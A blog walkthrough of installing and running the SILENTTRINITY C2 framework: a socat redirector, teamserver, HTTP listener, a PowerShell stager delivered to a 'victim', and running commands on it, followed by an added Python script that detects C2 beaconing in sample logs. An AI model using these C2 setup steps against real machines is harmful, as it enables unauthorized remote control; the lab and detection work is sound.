Now we are going to look at SILENTTRINITY from @byt3bl33d3r. I think this will be the last test of a Command and Control application, as I have other stuff to do. But I hope you all had a good read and that it set some things in motion for you.
Here is the link where you can read about and download SILENTTRINITY: https://github.com/byt3bl33d3r/SILENTTRINITY
A picture says more than a thousand words, so let's start with that!
- Run socat for external access from the victim to the C2
- Install kali
- Install SILENTTRINITY
- Create listeners
- Create payloads
- Run payloads
- Take over the machine
Go back a few blog posts to get more information about socat.
sudo socat TCP4-LISTEN:80,fork,reuseaddr TCP:172.21.21.41:80
Let's jump into the installation of SILENTTRINITY.
Git clone the repository:
git clone https://github.com/byt3bl33d3r/SILENTTRINITY.git
Time to do some pip3. I also tried to install this on a clean Ubuntu 20.10, but got some errors about Python crypto stuff, cffi modules and so on. It worked directly on a Kali box. I fixed that with the command below:
sudo apt-get install build-essential libssl-dev libffi-dev python-dev
Time to install:
pip3 install --user pipenv && pipenv install && pipenv shell
Run the server:
python3.9 st.py teamserver 172.21.21.40 password
Time to connect to the teamserver from the client.
Type list to see the connection.
Time to create a listener for our victim to connect to. Type list under listeners to see what listeners you have.
This time we use the HTTP one with the command below.
Create a payload, or stager as it is called here.
Generate the stager for the HTTP listener:
use powershell_stageless
Now take this stager.ps1 and get it onto the victim in some way. Use your own imagination for how to do that: www, ftp, floppy, cd or irc…
Run it on the client.
Go back to the SILENTTRINITY client to interact with the victim.
See the active sessions and list them. The name here is important; we use that name when we run our modules.
How to use a module on a connected victim
Use the module and run it:
set Command whoami
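From the defender's side, the thing to notice about this setup is the victim checking in to the HTTP listener (via the socat redirector on port 80) at a regular interval. Below is an added example, not part of the original post or of SILENTTRINITY, that flags such beaconing in constructed proxy log lines by looking for (source, destination) pairs with very regular inter-arrival times. The log format and the redirector address 203.0.113.10 are assumptions made up for the example.

```python
"""Flag regular HTTP check-ins (beaconing) in proxy-style log lines.

Added example, not from the original post or from SILENTTRINITY.
Assumed log format (constructed): timestamp src dst:port method path.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: 10.0.0.5 checks in every 5 s to the assumed redirector
# 203.0.113.10:80; 10.0.0.7 browses a normal site with irregular timing.
SAMPLE_LOG = """\
2021-01-10T10:00:00 10.0.0.5 203.0.113.10:80 GET /index.html
2021-01-10T10:00:05 10.0.0.5 203.0.113.10:80 GET /index.html
2021-01-10T10:00:10 10.0.0.5 203.0.113.10:80 GET /index.html
2021-01-10T10:00:15 10.0.0.5 203.0.113.10:80 GET /index.html
2021-01-10T10:00:20 10.0.0.5 203.0.113.10:80 GET /index.html
2021-01-10T10:00:01 10.0.0.7 198.51.100.20:80 GET /
2021-01-10T10:00:09 10.0.0.7 198.51.100.20:80 GET /news
2021-01-10T10:03:40 10.0.0.7 198.51.100.20:80 GET /about
2021-01-10T10:11:02 10.0.0.7 198.51.100.20:80 GET /contact
"""


def parse(log: str):
    """Group connection timestamps by (src, dst) pair."""
    pairs = defaultdict(list)
    for line in log.splitlines():
        ts, src, dst, _method, _path = line.split()
        pairs[(src, dst)].append(datetime.fromisoformat(ts))
    return pairs


def find_beacons(log: str, min_hits: int = 4, max_cv: float = 0.2):
    """Return (src, dst, mean_gap_seconds) for pairs seen at least min_hits
    times whose gaps are regular: coefficient of variation below max_cv."""
    hits = []
    for (src, dst), times in parse(log).items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg < max_cv:
            hits.append((src, dst, avg))
    return hits


if __name__ == "__main__":
    for src, dst, avg in find_beacons(SAMPLE_LOG):
        print(f"possible beacon: {src} -> {dst} every {avg:.1f}s")
```

Real stagers usually add jitter to the sleep, so raise max_cv and require more hits when running this over real logs.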
So this was the last C2 in this round. I hope that in the future I will have time to test some more C2 stuff.